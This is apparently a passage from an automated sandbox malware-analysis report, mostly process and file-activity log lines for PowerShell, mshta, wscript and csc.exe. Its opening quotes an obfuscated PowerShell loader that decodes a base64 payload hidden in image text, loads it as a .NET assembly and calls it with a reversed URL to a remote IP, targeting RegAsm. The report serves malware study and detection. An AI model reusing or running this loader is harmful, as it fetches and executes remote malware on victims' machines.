{1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)\| invoke-expresSIon"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_02A342D1 push ebx; ret	3_2_02A342DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_02A356E8 pushad ; ret	3_2_02A35711
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_02A35718 pushfd ; ret	3_2_02A35721
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_071029B6 push ebp; iretd	3_2_071029B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07102807 push esp; iretd	3_2_07102808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04E4385D pushad ; retf	9_2_04E43861

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
